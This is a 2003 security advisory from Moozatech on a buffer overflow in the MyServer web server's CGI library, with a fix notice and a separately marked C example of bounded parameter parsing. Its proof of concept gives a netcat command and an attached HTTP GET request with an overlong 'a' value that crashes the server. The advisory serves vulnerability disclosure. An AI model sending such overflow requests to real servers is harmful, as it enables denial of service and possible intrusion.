
Moozatech: MyServer Buffer Overflow vulnerability



12/09/03

Moozatech Advisory              http://www.moozatech.com/mt-12-09-2003.txt

-------------------------------------------------------

Application: MyServer Web Server
Web Site:    http://myserverweb.sf.net
Versions:    0.4.3 and below
Platform:    Windows 98, Windows 2000, Linux
Bug:         Buffer Overflow.
Risk:        Remote DoS and unauthorized remote access.
Severity:    High
Fix Available: Yes
-------------------------------------------------------

1) Introduction
2) Bug
3) Proof of concept
4) Fix
5) About Moozatech

===============
1) Introduction
===============

MyServer is a free, powerful web server program designed to be easily run on
a personal computer by the average computer user.
It is a multithreaded application and supports the HTTP, CGI, ISAPI, WinCGI
and FastCGI protocols.


======
2) Bug
======

A buffer overflow might allow a remote attacker to execute malicious code by
submitting a request containing excessive data.
That will cause a buffer overflow and might allow the attacker to run code of
their choice with the web server's privileges.
The problem is in the MSCGI library (cgi-lib.dll), which does not correctly
handle long string values for the URI variables.
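
An added example, not MyServer's code and not part of the advisory: a bounded
extraction of one URI variable from a query string that rejects an overlong
value instead of copying it into a fixed buffer. The helper name
get_query_param, its return codes and the 64-byte PARAM_MAX are assumptions;
the advisory does not give the real buffer size.

```c
#include <stddef.h>
#include <string.h>

/* Assumed limit for this example; the advisory does not state the real size. */
#define PARAM_MAX 64

/* Return codes of the hypothetical helper below (not MyServer's API). */
enum { PARAM_OK = 0, PARAM_MISSING = -1, PARAM_TOO_LONG = -2 };

/*
 * Copy the value of `name` from a raw query string ("a=1&b=2") into `out`.
 * The value length is measured first, and the request is rejected (not
 * truncated) when the value plus its terminating NUL would not fit.
 */
int get_query_param(const char *query, const char *name, char *out, size_t outsz)
{
    size_t nlen = strlen(name);
    const char *p = query;

    if (outsz == 0)
        return PARAM_TOO_LONG;
    out[0] = '\0';

    while (*p) {
        const char *end = strchr(p, '&');   /* end of this name=value pair */
        if (!end)
            end = p + strlen(p);
        if ((size_t)(end - p) > nlen && strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            const char *val = p + nlen + 1;
            size_t vlen = (size_t)(end - val);
            if (vlen >= outsz)              /* no room for value + NUL */
                return PARAM_TOO_LONG;
            memcpy(out, val, vlen);
            out[vlen] = '\0';
            return PARAM_OK;
        }
        p = (*end == '&') ? end + 1 : end;
    }
    return PARAM_MISSING;
}

/* Constructed sample: "a=" followed by 100 'A' bytes, an overlong value. */
int demo_overlong(void)
{
    char query[2 + 100 + 1] = "a=";         /* remaining bytes start as NUL */
    char out[PARAM_MAX];
    memset(query + 2, 'A', 100);
    return get_query_param(query, "a", out, sizeof out);
}
```

A caller would answer PARAM_TOO_LONG with an HTTP error and never pass the
value on to the CGI handler.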


====================
3) Proof of concept.
====================

nc.exe -v www.victim.com < request.txt

--
The script is attached.
This will crash the program with a memory overflow.


======
4) Fix
======

The author has confirmed this bug, and a temporary fix is available through
the MyServer CVS repository at:
http://myserverweb.sourceforge.net/cvs.php
A complete patch will be available in the next release of MyServer.


==================
5) About Moozatech
==================

Moozatech IT Systems Ltd. (“Moozatech”) is a leading information security
consulting and project management firm focused on developing
"Secure IT Solutions" which best suit the client's operational needs.
Moozatech devotes time to make a secure computing environment for customers.

-----

Moran Zavdi
Moozatech IT Systems
www.moozatech.com
GET 
/cgi-bin/math_sum.mscgi?a=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Moozatech (compatible; Moozatech Scanner)
Host: 12.12.12.12
Connection: Keep-Alive